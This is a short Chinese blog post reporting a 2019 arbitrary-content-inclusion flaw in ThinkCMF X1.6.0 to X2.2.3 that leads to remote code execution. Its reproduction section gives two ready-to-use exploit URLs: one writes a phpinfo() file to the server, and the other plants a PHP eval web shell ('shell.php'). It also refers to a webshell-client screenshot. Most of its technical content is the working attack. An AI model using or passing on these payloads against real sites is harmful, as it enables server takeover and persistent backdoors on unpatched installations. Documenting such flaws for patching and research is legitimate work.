应用安全

ThinkCMF X1.6.0-X2.2.3任意内容包含漏洞

Date：
2019.10

类型：
任意文件写入导致远程代码执行

影响范围：
ThinkCMF X1.6.0
ThinkCMF X2.1.0
ThinkCMF X2.2.0
ThinkCMF X2.2.1
ThinkCMF X2.2.2
ThinkCMF X2.2.3

复现：
写入phpinfo()
http://127.0.0.1/cmfx-master/?a=fetch&templateFile=public/index&prefix=''&content=<php>file_put_contents('test.php','<?php phpinfo(); ?>')</php>
写入PHP后门
http://127.0.0.1/cmfx-master/?a=fetch&templateFile=public/index&prefix=''&content=<php>file_put_contents('shell.php','<?php @eval($_POST[1]); ?>')</php>
冰蝎成功截图：

相关阅读:
Yii AR Model 查询
学习进度4
学习进度三
个人每日总结7
个人每日总结6
个人每日总结5
个人每日总结4
个人冲刺承担的任务项目的用户模板和用户场景模板
个人每日总结3
个人每日总结2

原文地址：https://www.cnblogs.com/AtesetEnginner/p/11911693.html